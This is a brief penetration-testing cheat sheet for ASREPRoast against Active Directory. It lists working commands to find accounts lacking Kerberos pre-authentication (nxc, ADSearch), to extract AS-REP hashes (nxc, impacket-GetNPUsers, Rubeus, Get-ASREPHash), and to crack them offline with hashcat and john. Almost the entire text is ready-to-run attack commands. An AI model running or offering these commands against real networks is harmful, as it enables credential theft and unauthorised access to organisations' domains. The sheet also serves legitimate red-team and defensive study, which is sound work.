ASREPRoast

Tags
KerberosUnauthenticatedInitial Access

Identify 

nxc ldap <IP> -u '' -p '' --query '(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))' ""
Remote
ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName
Local

Exploit

Ask for TGS

nxc ldap <IP> -u '<USER>' -p '' --asreproast output.txt
Remote
impacket-GetNPUsers domain.local/svc-test -no-pass
Remote
Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt /user:svc-test /nowrap
Local
Get-ASREPHash -Username svc-test -verbose
Local - https://github.com/HarmJ0y/ASREPRoast

Crack ticket

hashcat -m 18200 --force -a 0 hashes.txt <wordlist>
john --wordlist=<wordlist> hashes.txt